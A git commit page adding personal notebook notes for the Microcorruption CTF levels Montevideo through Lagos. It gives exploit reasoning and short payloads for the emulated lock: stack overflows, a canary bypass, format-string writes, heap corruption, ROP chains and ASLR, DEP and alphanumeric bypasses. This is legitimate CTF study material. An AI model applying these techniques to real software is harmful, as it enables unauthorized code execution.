mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-23 10:15:59 +00:00
notes.md: Add book notes for Montevideo through Lagos
This commit is contained in:
parent
5e23a963ec
commit
95e7776c8a
26
10-Santa Cruz/notes.md
Normal file
26
10-Santa Cruz/notes.md
Normal file
@ -0,0 +1,26 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Santa Cruz
|
||||
2 buffers
|
||||
username [0x63] -> 2404 -> 43a2
|
||||
password [0x63] -> 2404 -> 43b5
|
||||
r4: return addr: 43cc
|
||||
Min len stored at 43b3
|
||||
username +0x11 index 17
|
||||
Max len stored at 43b4
|
||||
username +0x12 index 18
|
||||
43c6 must be 00
|
||||
-> password must be 16 chars
|
||||
so strcpy places 00 there
|
||||
-> password: "passwordpassword"
|
||||
|
||||
username[0x11] = 01
|
||||
username[0x12] = 7f
|
||||
username[0x42+]= 4a44
|
||||
|
||||
Don't put important constants on the stack?
|
||||
Strcpy does copy the last null byte
|
||||
|
||||
A program
|
||||
```
|
30
11-Jakarta/notes.md
Normal file
30
11-Jakarta/notes.md
Normal file
@ -0,0 +1,30 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Jakarta
|
||||
Acquires 0xff username bytes
|
||||
-> 3ff2
|
||||
Acquires 0x1f - uname_len password bytes
|
||||
(1f - uname_len) & 0x1ff
|
||||
uname_len = 0x20? 0x21?
|
||||
=> passwd_len = 0x1ff
|
||||
-> concatenated to username?
|
||||
Return value at 401c
|
||||
= [username][password][...]
|
||||
|
||||
before strcpy:
|
||||
username -> 2402
|
||||
password -> 2402
|
||||
concat happens in stack buffer
|
||||
Length check happens Byte
|
||||
0120 ~= 0x20 <= 0x21
|
||||
u_len = (20 or 21)
|
||||
p_len = (e0 -> 100)
|
||||
|
||||
Password
|
||||
AA [r11] [ret] [fakeret] [args] [AA...AA]
|
||||
|
||||
Lesson: Sometimes things are not the data type you think they are
|
||||
```
|
||||
|
||||
`// TODO: What does this mean??`
|
24
12-Addis Ababa/notes.md
Normal file
24
12-Addis Ababa/notes.md
Normal file
@ -0,0 +1,24 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Addis Ababa
|
||||
format string vulns? (manual hint)
|
||||
%n: store # chars printed into stack vaf
|
||||
? where ?
|
||||
-> 2 prev characters??
|
||||
30e0: flag location
|
||||
lE: e0 30
|
||||
|
||||
30e0: \0\0 n a m e : p a s s\0
|
||||
argv [ 1 ][ 2 ][ 3 ][ 4 ][ 5 ][ 6 ]
|
||||
|
||||
addr A %n
|
||||
e0 30 %n %n
|
||||
DEL 0 %n %n
|
||||
|
||||
```
|
||||
|
||||
Editor's note:
|
||||
```
|
||||
e030 256e 256e
|
||||
```
|
14
13-Novosibirsk/notes.md
Normal file
14
13-Novosibirsk/notes.md
Normal file
@ -0,0 +1,14 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Novosibirsk
|
||||
Gets 1f4 characters
|
||||
Actually allocates proper buffer
|
||||
|
||||
44c8: interrupt #
|
||||
would be nice to set this to 7f
|
||||
|
||||
Hypothesis:
|
||||
"[addr]['A';0x7d]%n"
|
||||
c844 4141... 25be
|
||||
Hole in one!
|
31
14-Algiers/notes.md
Normal file
31
14-Algiers/notes.md
Normal file
@ -0,0 +1,31 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Algiers d.01
|
||||
"LockIT Pro Account Manager"
|
||||
Tentative TODO:
|
||||
Authorizer? How to auth user
|
||||
Interfaces with HSM1
|
||||
|
||||
I can overflow heap objects
|
||||
uname&pass 0x30 long
|
||||
>0x10 overflows
|
||||
Can I craft a fake heap object?
|
||||
username -> overwrite pass blk header?
|
||||
password -> ???
|
||||
|
||||
Hypothesis: arb write in free()
|
||||
Username
|
||||
passwordpassword[addr]
|
||||
"d E "?
|
||||
4398:
|
||||
0000 4044 0000 .... Unguarded
|
||||
in free: free() is arb
|
||||
r15 = &this_block write~!
|
||||
r14 = &prev_block
|
||||
r13 = {size:15,final:1}
|
||||
r12 = {prev_size:5,final:1}
|
||||
if prev is final:
|
||||
skip last-block steps
|
||||
else last-block steps
|
||||
```
|
61
15-Vladivostok/notes.md
Normal file
61
15-Vladivostok/notes.md
Normal file
@ -0,0 +1,61 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Vladivostok ASLR bypass?
|
||||
username[8]: 0x242b
|
||||
password[ ]
|
||||
aslr_base = r11
|
||||
|
||||
aslr_address = normal - 0x4000 + aslr_base
|
||||
|
||||
Have to call 0x10 directly?
|
||||
INT 7f:
|
||||
Takes no arguments (THE LESSON WAS)
|
||||
7f passed in SR (ROP CHAINING)
|
||||
All calls to INT wrapped in (+ASLR BYPASS)
|
||||
push/pop SR?
|
||||
Neat?
|
||||
|
||||
41414141[r10][r11][ret]
|
||||
FUCKING PRINTF?
|
||||
|
||||
Things I have:
|
||||
printf(username, ...)
|
||||
buffer overflow on stack
|
||||
|
||||
Things I need
|
||||
Address on stack?
|
||||
|
||||
Flow: 1. enter "username"
|
||||
2. "username" printed
|
||||
<- Create payload
|
||||
3. enter "password"
|
||||
4. buffer overflow
|
||||
```
|
||||
|
||||
# Page 2
|
||||
```
|
||||
The Hack (Vladivostok)
|
||||
|
||||
Uname payload: "%x%x%x%x"
|
||||
output %printf
|
||||
Pword payload: "AAAA(r10)(r11)(pc)[args...]"
|
||||
|
||||
Useful locations:
|
||||
+2aa: pop sr
|
||||
+2ac: add 8, sp
|
||||
+2ae: __check_password
|
||||
|
||||
+56c: mov.b @sp, r15;
|
||||
sxt r15 ; pop.b r15
|
||||
incd sp ;
|
||||
ret ;
|
||||
|
||||
+4f4: swpb r15 ;
|
||||
mov r15, sr ;
|
||||
bis #8000, sr ; INT
|
||||
call 0x10 ;
|
||||
... ;
|
||||
ret ;
|
||||
|
||||
[popb]7f7f[INT]
|
23
16-Bangalore/notes.md
Normal file
23
16-Bangalore/notes.md
Normal file
@ -0,0 +1,23 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Bangalore DEP/NX
|
||||
Passwords 8-16 chars } 0x20 B limit
|
||||
Takes 0x30 (48) chars }
|
||||
|
||||
Strategy: Construct a ROP chain
|
||||
to turn page 45 executable
|
||||
NO STRCPY
|
||||
|
||||
mark_page_executable @ 44ba
|
||||
44ba: sub #6, sp
|
||||
mov #9100, sr
|
||||
call #0x10
|
||||
add #0xa, sp
|
||||
RET
|
||||
|
||||
4458: call 0x10
|
||||
|
||||
ROP to set stack executable,
|
||||
Exec to open the lock
|
||||
```
|
129
17-Lagos/notes.md
Normal file
129
17-Lagos/notes.md
Normal file
@ -0,0 +1,129 @@
|
||||
`Taken from my notebook, verbatim`
|
||||
|
||||
|
||||
### Page 5
|
||||
```
|
||||
LAGOS
|
||||
45a0: 0b41 -> 3041 "ret"
|
||||
|
||||
WE CAN add #4130, sp
|
||||
~ MOVE THE STACK ~
|
||||
|
||||
0: input [0x1bf]=
|
||||
1: ret -> 4444 (sp+0x60)
|
||||
2: Move stack to 2400+1c0
|
||||
3: Ret -> arbitrary address (i.e. 2400+1c2)
|
||||
4: Execute arbitrary code
|
||||
```
|
||||
|
||||
### Page 1
|
||||
```
|
||||
Lagos Alphanumerics Only
|
||||
`0x200 B -> #2400`
|
||||
Password valid range: 8-16 c
|
||||
Valid chars:
|
||||
[0-9] [A-Z] [a-z]
|
||||
30-39 41-5a 61-7a
|
||||
|
||||
We have enough chars
|
||||
to overwrite current
|
||||
function
|
||||
|
||||
1b5 bytes before hitting
|
||||
current instruction
|
||||
|
||||
3041 = ret
|
||||
45a0 = 0b41
|
||||
at index 1b5
|
||||
Control of return addr
|
||||
-> we can ret to string buffer
|
||||
bypassing sanitizer!
|
||||
|
||||
ret to 2400+1bb
|
||||
25b5
|
||||
run code from there!
|
||||
ret at index 0x11
|
||||
... we need a JMP to get there.
|
||||
... all our jumps are positive
|
||||
```
|
||||
|
||||
### Page 2
|
||||
```
|
||||
D p
|
||||
4470 looks like a good place
|
||||
D 0
|
||||
for code, or 4430
|
||||
|
||||
5a37: jge $-14a ?
|
||||
|
||||
Arithmetic instructions
|
||||
Form addresses with sub?
|
||||
25 b6 bb25
|
||||
^lsb
|
||||
55-30 7a-30(ish)
|
||||
547a + 3030 =
|
||||
5630 - 307a = 25bb!
|
||||
V 0 0 z
|
||||
|
||||
We can load from our string:
|
||||
pop r4 = 3441
|
||||
"4 A "
|
||||
-> can be any reg from
|
||||
0-9: 3r41
|
||||
add.b = 7x5y
|
||||
3451 = pop & add to r4
|
||||
|
||||
3441 3451
|
||||
pop r4 add r4
|
||||
```
|
||||
|
||||
### Page 3
|
||||
```
|
||||
Instructions in range
|
||||
30: jn
|
||||
34: jge
|
||||
38: jl
|
||||
3c: jmp
|
||||
|
||||
4#: mov
|
||||
5#: add
|
||||
6#: addc
|
||||
7#: subc
|
||||
|
||||
Feasible addressing modes
|
||||
10 @Rn Register indirect
|
||||
11 @Rn+ RI w/ post-inc
|
||||
|
||||
Subtract the stack from pc?
|
||||
3071 subc @sp+, pc
|
||||
"Large relative jump"
|
||||
|
||||
Alignment in 2400 buffer
|
||||
is not same as in PC
|
||||
```
|
||||
|
||||
### Page 4
|
||||
```
|
||||
What is an alphanumeric character?
|
||||
[0-9] [A-Z] [a-z]
|
||||
30-39 41-5a 61-7a
|
||||
|
||||
Buffers: 43ed: stack buffer
|
||||
2400: load buffer
|
||||
|
||||
43ed + 0x57: 4444
|
||||
|
||||
45a0: last byte copied (1b3 bytes)
|
||||
&[43ed + 1b3] = 0x30, '0'
|
||||
43ed + 1c0 = payload
|
||||
|
||||
Correction: sp at 43ec before
|
||||
we gain exec
|
||||
ret will tak sp to 43ee
|
||||
... we need to create a fake stack
|
||||
somewhere over in the controllable
|
||||
zone
|
||||
|
||||
The loop only continues if the
|
||||
FOLLOWING BYTE is valid.
|
||||
```
|
14
8-Montevideo/notes.md
Normal file
14
8-Montevideo/notes.md
Normal file
@ -0,0 +1,14 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Montevideo
|
||||
strcpy/memset
|
||||
|
||||
Allocated 16-byte buffer on stack
|
||||
Strcpy into it
|
||||
43ee: start of stack buffer
|
||||
43fe: return address
|
||||
454c: INT
|
||||
|
||||
['A';16] 4c45 0000 7f
|
||||
```
|
16
9-Johannesberg/notes.md
Normal file
16
9-Johannesberg/notes.md
Normal file
@ -0,0 +1,16 @@
|
||||
`Taken verbatim from my notebook`
|
||||
# Page 1
|
||||
```
|
||||
Johannesberg STACK CANARY
|
||||
Gets 3f bytes
|
||||
strcpy over stack
|
||||
...
|
||||
cmp str[0x11] == c6
|
||||
if str[0x11] == c6 ; 17th byte is c6
|
||||
add #0x12, sp
|
||||
ret
|
||||
else
|
||||
halt
|
||||
|
||||
['A';16] cb cb 94 45 20 20 7f
|
||||
```
|
Loading…
Reference in New Issue
Block a user